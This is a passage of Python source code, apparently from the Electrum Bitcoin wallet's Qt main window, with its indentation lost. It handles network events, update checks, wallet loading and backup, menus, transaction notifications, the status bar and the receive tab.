QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once the GUI has been initialized, check if we want to announce something, since the callback was called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Gossip"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
if not constants.net.TESTNET:
help_menu.addAction(_("&Bitcoin Paper"), self.show_bitcoin_paper)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
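# Illustrative example (actual output depends on config and loaded FX rates):
# 123456 sats with BTC as base unit and a USD rate loaded might render as
# "0.00123456 BTC (55.12 USD)"; the numbers here are made up for illustration.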
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
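# Keeps a BTC amount edit and its fiat counterpart in sync: editing either field
# recomputes the other from the current exchange rate. The `follows` flags mark a
# programmatic update so it does not re-trigger this handler and cause a feedback loop.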
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
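# U+26A1 below is the 'high voltage' (lightning bolt) glyph used to mark the Lightning balance.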
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('On-chain'))  # distinguish it from the Lightning button added below
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
